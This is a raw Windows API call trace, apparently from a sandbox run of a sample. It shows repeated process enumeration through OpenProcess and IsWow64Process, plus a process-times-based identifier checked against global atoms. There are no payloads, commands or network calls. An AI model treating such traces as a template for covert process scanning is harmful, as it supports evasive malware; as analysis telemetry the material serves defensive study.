	[0106.908] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.908] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.908] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.908] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.909] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.909] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.909] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.909] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.909] CloseHandle (hObject=0x694) returned 1
	[0106.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.909] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.909] CloseHandle (hObject=0x694) returned 1
	[0106.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.909] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.909] CloseHandle (hObject=0x694) returned 1
	[0106.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.910] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.910] CloseHandle (hObject=0x694) returned 1
	[0106.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.947] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.947] CloseHandle (hObject=0x694) returned 1
	[0106.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.948] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.948] CloseHandle (hObject=0x694) returned 1
	[0106.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.948] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.948] CloseHandle (hObject=0x694) returned 1
	[0106.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.948] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.948] CloseHandle (hObject=0x694) returned 1
	[0106.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.949] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.949] CloseHandle (hObject=0x694) returned 1
	[0106.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.949] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.949] CloseHandle (hObject=0x694) returned 1
	[0106.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.949] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.949] CloseHandle (hObject=0x694) returned 1
	[0106.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.949] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.949] CloseHandle (hObject=0x694) returned 1
	[0106.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.949] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.949] CloseHandle (hObject=0x694) returned 1
	[0106.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.950] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.950] CloseHandle (hObject=0x694) returned 1
	[0106.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.950] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.950] CloseHandle (hObject=0x694) returned 1
	[0106.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.950] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.950] CloseHandle (hObject=0x694) returned 1
	[0106.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.950] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.950] CloseHandle (hObject=0x694) returned 1
	[0106.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.950] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.950] CloseHandle (hObject=0x694) returned 1
	[0106.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.951] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.951] CloseHandle (hObject=0x694) returned 1
	[0106.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.951] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.951] CloseHandle (hObject=0x694) returned 1
	[0106.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.951] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.951] CloseHandle (hObject=0x694) returned 1
	[0106.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.951] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.951] CloseHandle (hObject=0x694) returned 1
	[0106.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.951] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.951] CloseHandle (hObject=0x694) returned 1
	[0106.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.952] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.952] CloseHandle (hObject=0x694) returned 1
	[0106.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.952] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.952] CloseHandle (hObject=0x694) returned 1
	[0106.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.952] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.952] CloseHandle (hObject=0x694) returned 1
	[0106.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.952] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.952] CloseHandle (hObject=0x694) returned 1
	[0106.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.952] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.952] CloseHandle (hObject=0x694) returned 1
	[0106.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.953] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.953] CloseHandle (hObject=0x694) returned 1
	[0106.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.953] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.953] CloseHandle (hObject=0x694) returned 1
	[0106.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.953] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.953] CloseHandle (hObject=0x694) returned 1
	[0106.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.953] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.953] CloseHandle (hObject=0x694) returned 1
	[0106.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.954] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.954] CloseHandle (hObject=0x694) returned 1
	[0106.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.954] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.954] CloseHandle (hObject=0x694) returned 1
	[0106.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.954] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.954] CloseHandle (hObject=0x694) returned 1
	[0106.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.954] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.955] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.955] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.955] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.955] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.955] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.955] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.956] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.956] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.956] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.956] CloseHandle (hObject=0x694) returned 1
	[0106.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.956] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.956] CloseHandle (hObject=0x694) returned 1
	[0106.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.956] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.956] CloseHandle (hObject=0x694) returned 1
	[0106.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.956] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.956] CloseHandle (hObject=0x694) returned 1
	[0106.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.995] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.995] CloseHandle (hObject=0x694) returned 1
	[0106.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.995] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.995] CloseHandle (hObject=0x694) returned 1
	[0106.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.995] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.995] CloseHandle (hObject=0x694) returned 1
	[0106.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.996] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.996] CloseHandle (hObject=0x694) returned 1
	[0106.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.996] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.996] CloseHandle (hObject=0x694) returned 1
	[0106.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.996] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.996] CloseHandle (hObject=0x694) returned 1
	[0106.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.996] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.996] CloseHandle (hObject=0x694) returned 1
	[0106.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.996] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.996] CloseHandle (hObject=0x694) returned 1
	[0106.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.997] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.997] CloseHandle (hObject=0x694) returned 1
	[0106.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.997] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.997] CloseHandle (hObject=0x694) returned 1
	[0106.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.997] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.997] CloseHandle (hObject=0x694) returned 1
	[0106.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.997] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.997] CloseHandle (hObject=0x694) returned 1
	[0106.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.998] CloseHandle (hObject=0x694) returned 1
	[0106.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.998] CloseHandle (hObject=0x694) returned 1
	[0106.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.998] CloseHandle (hObject=0x694) returned 1
	[0106.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.998] CloseHandle (hObject=0x694) returned 1
	[0106.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.998] CloseHandle (hObject=0x694) returned 1
	[0106.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.999] CloseHandle (hObject=0x694) returned 1
	[0106.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.999] CloseHandle (hObject=0x694) returned 1
	[0106.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.999] CloseHandle (hObject=0x694) returned 1
	[0106.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.999] CloseHandle (hObject=0x694) returned 1
	[0106.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.999] CloseHandle (hObject=0x694) returned 1
	[0107.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.000] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.000] CloseHandle (hObject=0x694) returned 1
	[0107.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.000] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.000] CloseHandle (hObject=0x694) returned 1
	[0107.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.000] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.000] CloseHandle (hObject=0x694) returned 1
	[0107.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.000] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.000] CloseHandle (hObject=0x694) returned 1
	[0107.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.000] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.000] CloseHandle (hObject=0x694) returned 1
	[0107.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.001] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.001] CloseHandle (hObject=0x694) returned 1
	[0107.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.001] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.001] CloseHandle (hObject=0x694) returned 1
	[0107.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.001] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.001] CloseHandle (hObject=0x694) returned 1
	[0107.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.001] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.001] CloseHandle (hObject=0x694) returned 1
	[0107.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.002] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.002] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.002] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.002] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.002] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.002] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.003] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.003] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.003] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.003] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.003] CloseHandle (hObject=0x694) returned 1
	[0107.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.003] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.003] CloseHandle (hObject=0x694) returned 1
	[0107.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.003] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.003] CloseHandle (hObject=0x694) returned 1
	[0107.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.004] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.004] CloseHandle (hObject=0x694) returned 1
	[0107.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
